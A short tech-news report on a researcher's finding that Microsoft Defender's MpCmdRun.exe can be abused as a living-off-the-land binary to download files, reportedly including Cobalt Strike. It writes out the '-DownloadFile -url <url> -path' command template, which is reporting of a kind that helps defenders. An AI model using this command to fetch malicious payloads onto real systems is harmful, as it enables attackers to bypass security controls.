According to Techradar reports, in the 4.18.2007.9 or 4.18.2009.9 version of Microsoft Defender, Microsoft has added the ability to download files through the command line. However, according to penetration tester Mohammad Askar, changes to the Microsoft Defender command-line tool may allow attackers to use it to download malicious programs .
Naijatechnews has learned that there are many LOLBins in Windows 10, and they all have legal functions. However, with appropriate privileges, hackers can abuse these binary files to bypass security facilities and conduct attacks without notifying the victim.
As stated by Askar, the Microsoft Defender command line tool now supports the new “-DownloadFile” feature. An attacker can use the Microsoft Anti-Malware Service command line utility to download files from the Internet with the following command: “MpCmdRun.exe -DownloadFile -url <url> -path >local-path> “.
In this way, Askar was able to download the Cobalt Strike malware from a remote location directly through Microsoft Defender.
Although Defender can detect and mitigate any malicious files downloaded using this method, it is not clear whether other popular antivirus services can defend against this attack method when native protection is disabled.
For more such interesting article like this, app/softwares, games, Gadget Reviews, comparisons, troubleshooting guides, listicles, and tips & tricks related to Windows, Android, iOS, and macOS, follow us on Google News, Facebook, Instagram, Twitter, YouTube, and Pinterest.